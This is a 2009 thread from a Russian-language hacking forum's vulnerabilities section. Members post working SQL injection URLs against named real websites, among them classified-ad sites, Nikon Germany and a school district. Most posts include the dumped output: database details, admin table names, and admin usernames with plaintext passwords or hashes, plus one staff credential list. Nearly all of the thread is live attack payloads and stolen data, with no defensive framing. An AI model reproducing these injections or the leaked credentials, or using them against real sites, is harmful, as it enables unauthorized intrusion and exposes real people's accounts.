ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9821  
Старый 11.06.2009, 12:20
Аватар для RulleR
RulleR
Reservists Of Antichat - Level 6
Регистрация: 12.06.2008
Сообщений: 157
Провел на форуме:
3217552

Репутация: 1668
Отправить сообщение для RulleR с помощью ICQ Отправить сообщение для RulleR с помощью Yahoo
По умолчанию

[PR 4]
Код:
http://www.noswizard.com/product_desc.php?id=-101+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52
4.1.22-standard-log:noswizards:noswizards@localhost

[PR 1]
Код:
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
5.0.77-community:cancuncl_classcancun:cancuncl_clcunmx@localhost
Код:
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_name=0x6672656574706c62616e6e6572735f61646d696e
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,concat_ws(0x3a,id,admin_name,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+freetplbanners_admin
id:admin_name:pwd
Цитата:
1:ricardo:rjBcnBN
[PR 0]
Код:
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
5.0.51a-log:sodager:sodager@boscgi1203.eigbox.net
Код:
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+where+table_name=0x7362636c61737369666965645f61646d696e
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,concat_ws(0x3a,id,admin_name,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+sbclassified_admin
id:admin_name:pwd
Цитата:
1:admin:aliadmin
 
Ответить с цитированием

  #9822  
Старый 11.06.2009, 12:40
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

PR4
http://www.sonorika.com/v2/people/pop.php?Id=-8513+union+select+1,concat_ws(0x3a,version(),user( ),database()),3
5.1.31-log:sonorika@62.149.199.54
 
Ответить с цитированием

  #9823  
Старый 11.06.2009, 13:00
Аватар для Dimionx
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

www.imperialeg.com

Код:
http://www.imperialeg.com/russian/page.php?pg=project_details&project_id=18+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x0b,version(),user(),database()),11,12,13,14,15,16,17,18,19

Версия - 5.0.77-community
Юзер - palmacom_user@localhost
БД - palmacom_db

Табличка admin:

Код:
http://www.imperialeg.com/russian/page.php?pg=project_details&project_id=18+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x0b,id,username,password),11,12,13,14,15,16,17,18,19+from+admin
Код:
admin 
89a99c4142817128be9eb8e7c8966592
Админка:
Код:
http://www.imperialeg.com/admin/
Username - admin
Password - (нужно расшифровать 89a99c4142817128be9eb8e7c8966592)
 
Ответить с цитированием

  #9824  
Старый 11.06.2009, 13:28
Аватар для udman
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

Цитата:
http://www.rivnepost.rovno.ua/showarticle.php?art=-005319+UNION+SELECT+0,1,2,3,4,concat_ws(0x0b,user( ),versi on(),database()),6,7,8,9,10,11,12,13,14,15,16+--+
rivnepost@localhost
4.1.22
rivnepostdb
 
Ответить с цитированием

  #9825  
Старый 11.06.2009, 14:25
Аватар для udman
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

Цитата:
http://sibkray.ru/vn/index.php?id=-97473+UNION+SELECT+0,concat_Ws(0x0b,user(),version (),datab ase()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24+--+
sibkray_site@localhost
5.0.45
sibkray_site

Таблы
Цитата:
http://sibkray.ru/vn/index.php?id=-97473+UNION+SELECT+0,concat_Ws(0x0b,table_name,col umn_na me),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20,21,22,23,24+FROM+INFORMATION_SCHEMA.COLUMNS+LIM IT+177,1+--+
 
Ответить с цитированием

  #9826  
Старый 11.06.2009, 14:40
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

https://www2.nikon.de/school.php?id=0138+union+select+1,2,3,concat_ws(0x 3a,version(),user(),database()),5,6,7/*
5.0.32-Debian_7etch10-log:nikon@localhost:nikon
куча таблиц, заинтересовала auth_user: user_id, username, password, perms.
Сдампим данные:

Код:
9e3cc66e1d74a0146cd1894b467c0d78:Werner:Jobs2003:Stellenangebote

650197885626a3fe3fab2acce484184a:katthoefer:ply44bs:User-Verwaltung,Events,Stellenangebote,Workshops,Händler,News,Presse,Händlersuche aktualisieren,Produktbild-Datenbank,Abonnenten verwalten,Protokolle verwalten,Kontakt,NPS,Leihgeräte,Testergebnisse,Händlerliste Aktionen

a38407df0c41b6131a06e5a15c3d6878:Jasper:nrap2348go:Events,Workshops

24565ae53b131bcbfa6be713e73e4195:Jacobs:t77jpftspw:User-Verwaltung,Events,Stellenangebote,Workshops,Händler,News,Presse,Service,Newsletter,Händlersuche aktualisieren,Produktbild-Datenbank,Abonnenten verwalten,Protokolle verwalten,Kontakt,NPS,Leihgeräte,Testergebnisse,Newsletter versenden,Datei-Anhänge verwalten

89059f997e1f01298b0ce8b79fdd6a37:Exner:nvd23r904:Events,Workshops

04aa721901ff6d81d06c1385d731de75:student:4hvt7cd:Events,Workshops,Produktbild-Datenbank,Testergebnisse

cf7e1c0ca503b386b34d61b4bfdd7744:Sperwer:R2dnc:Events

22e91f6b1eb5da862837286f3e8ffb14:kickingereder:jnd242go:User-Verwaltung,Events,Stellenangebote,Workshops,Händler,News,Presse,Service,Newsletter,Händlersuche aktualisieren,Produktbild-Datenbank,Abonnenten verwalten,Protokolle verwalten,Kontakt,NPS,Leihgeräte,Testergebnisse,Newsletter versenden,Datei-Anhänge verwalten

f0a7962c9acfa9b994569bc675b2e0a0:Deines:3sdg339z:Events,Workshops
так же есть таблица: auth_user_md5, с такими же полями. Дамп

Код:
c14cbf141ab1b7cd009356f555b607dc:kris:098f6bcd4621d373cade4e832627b4f6:admin
135ff2008ba9e9e21084c045d0c5825d:nikon:d81e22674cc2c1c62b84500e436e6ad8:admin
 
Ответить с цитированием

  #9827  
Старый 11.06.2009, 14:48
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.zababahai.ru/page/news-read.php?news=-12+UnIoN+SeLecT+1,table_name,3,4,5,6+from+informat ion_schema.tables+/*+
1::ekar@yandex.ru::100::b358721da28f6306c17fc80e4a 7eaa7d3abe300a

http://woman1.ru/vote.php?nom=-4'+union+select+1,2,table_name,4,5,6,7+from+inform ation_schema.tables+/*+

http://board.ebashmetall.ru/index.php?catid=-29+union+select+1,table_name,3,4,5+from+informatio n_schema.tables+limit+10,100+/*+

http://avtoton.net/?id=cat&type=-58+union+select+1,concat_ws(0x3a3a,login,pass)+fro m+users+/*+
avtoton::080383
http://avtoton.net/admin/

http://kraskolizey.com/books-describe.php?id=-4+union+select+1,user_name,3,password,5,6,7,8+from +users+limit+5,1+/*+
admin::neadmin
kadmin::kolizey
webmaster::webmaster
http://kraskolizey.com/admin/

Последний раз редактировалось DezMond™; 11.06.2009 в 15:23..
 
Ответить с цитированием

  #9828  
Старый 11.06.2009, 15:26
Аватар для AlexSatter
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.wpcsd.org/education/components/form/default.php?sectiondetailid=118+and+substring(vers ion(),1,1)=5


http://longisland.newsday.com/schools/school.php?id=774940+and+substring(version(),1,1)= 5/*
 
Ответить с цитированием

  #9829  
Старый 11.06.2009, 15:56
Аватар для Kimliksiz
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://plintu.com/classifide_ad.php?item_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,CONCAT(user_name,char(58),password),6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 ,43,44,45,46,47,48,49,50,51,52,53,54/**/FROM/**/admin/**/LIMIT/**/0,1/*

admin:$1$cOzWWNQQ$4S9o1bLzmq1MIhAcSwUdR.


==============================
jokester:
не подскажешь что мне нужно сделать, что-бы ты не переписывал тему сначала?

Неужели так трудно чекать скули на антибояне?
http://bestquest.info/sql/
bid4tackle.com БОЯН

Я устал удалять и править твои посты, не будешь соблюдать правила, буду просить о бане

Последний раз редактировалось jokester; 11.06.2009 в 16:21.. Причина: bid4tackle.com БОЯН
 
Ответить с цитированием

  #9830  
Старый 11.06.2009, 16:30
Аватар для Kimliksiz
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://www.1mileup.com/links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,nul l,user_name,%205%20,password,null%20FROM%20Users
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ